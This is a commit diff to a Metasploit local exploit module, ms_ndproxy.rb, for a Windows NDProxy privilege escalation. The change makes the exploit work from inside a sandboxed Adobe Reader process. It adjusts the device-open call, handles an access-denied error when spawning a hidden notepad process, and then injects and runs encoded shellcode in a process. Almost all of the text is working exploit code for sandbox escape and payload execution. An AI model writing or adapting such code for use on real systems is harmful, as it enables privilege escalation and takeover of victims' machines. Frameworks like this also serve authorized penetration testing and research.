Fix ms_ndproxy to work under a sandboxed Reader

Author: jvazquez-r7

modules/exploits/windows/local/ms_ndproxy.rb

@@ -150,7 +150,7 @@ def open_device(dev)
 
     invalid_handle_value = 0xFFFFFFFF
 
-    r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", 0, 0)
+    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
 
     handle = r['return']
 
@@ -234,7 +234,14 @@ def create_proc
     windir = expand_path("%windir%")
     cmd = "#{windir}\\System32\\notepad.exe"
     # run hidden
-    proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    begin
+      proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    rescue Rex::Post::Meterpreter::RequestError
+      # when running from the Adobe Reader sandbox:
+      # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
+      return nil
+    end
+
     return proc.pid
   end
 
@@ -424,17 +431,24 @@ def exploit
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
     end
 
+    p = payload.encoded
     print_good("Exploitation successful! Creating a new process and launching payload...")
     new_pid = create_proc
-    p = payload.encoded
+
+    if new_pid.nil?
+      print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
+    end
 
     print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
-    if execute_shellcode(p, nil, new_pid)
+    shellcode_executed = execute_shellcode(p, nil, new_pid)
+
+    if shellcode_executed
       print_good("Enjoy")
     else
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
 
+
   end
 
 end